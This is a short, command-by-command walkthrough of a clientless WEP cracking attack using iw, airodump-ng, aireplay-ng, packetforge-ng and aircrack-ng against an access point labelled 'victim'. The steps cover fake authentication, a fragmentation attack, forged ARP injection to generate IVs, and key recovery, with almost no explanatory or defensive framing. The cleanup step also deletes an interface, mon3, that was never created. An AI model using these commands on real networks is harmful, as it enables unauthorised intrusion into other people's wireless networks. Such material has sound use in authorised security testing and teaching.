1. Create the wireless monitor interface(s).
sudo iw wlan1 interface add mon0 type monitor
sudo iw wlan1 interface add mon1 type monitor
sudo iw wlan1 interface add mon2 type monitor
2. Recon and gather info using any of the monitor mode interfaces.
sudo airodump-ng --band abg mon0
Take note of the BSSID, channel, encryption, Cipher, and ESSID.
Once the BSSID/ESSID is obtained, execute a filtered capture on the target network.
sudo airodump-ng --channel 11 --bssid 20:AA:4B:4A:93:F7 -w WIFOO-ATTACK-2 mon0 --ignore-negative-one
3. Document the BSSID of the AP, the channel, and the MAC address of the monitor mode interface.
echo victim 20:AA:4B:4A:93:F7 > attackinfo
echo channel 11 >> attackinfo
echo mon0 00-C0-CA-88-8B-69 >> attackinfo
4. Initiate a “fake” authentication with the access point using aireplay-ng.
sudo aireplay-ng --fakeauth 60 -a 20:aa:4b:4a:93:f7 -h 00-C0-CA-88-8B-69 mon0 --ignore-negative-one
Executing the command will cause the monitor mode interface to associate with the AP.
Inspection of the airodump-ng capture shows that the AP accepted the association.
For the WEP attack to work, the association must be valid. The previously executed command will maintain a continuous connection.
5. Execute the fragmentation attack using aireplay. Reference: https://www.aircrack-ng.org/doku.php?id=fragmentation
sudo aireplay-ng --fragment -b 20:aa:4b:4a:93:f7 -h 00-C0-CA-88-8B-69 mon0 --ignore-negative-one
6. Generate an ARP packet with packetforge-ng from the .xor file (the keystream recovered by the fragmentation attack in step 5). This packet will be injected into the network.
The goal of the injection is to rapidly increase the number of data frames sent by the AP. At this point only 300+ data frames have been captured, which is far too few to crack WEP.
sudo packetforge-ng -0 -a 20:AA:4B:4A:93:F7 -h 00-C0-CA-88-8B-69 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0316-175707.xor -w clientlessinject
7. Next, inject the packet into the network using aireplay-ng with the interactive option. This should cause the AP to generate weak IVs.
sudo aireplay-ng --interactive -r clientlessinject mon0
The AP should now generate a large number of IVs, which is what aircrack-ng needs to recover the WEP key.
8. With 10,000 IVs collected, it’s time to try cracking the key using the .cap file that is being logged. Run the crack with injection running. The more frames, the better.
sudo aircrack-ng -0 WIFOO-ATTACK-2-01.cap
The key length shouldn’t matter once many IVs are collected.
9. Delete the monitor mode interfaces.
sudo iw dev mon0 del
sudo iw dev mon2 del
sudo iw dev mon1 del
sudo iw dev mon3 del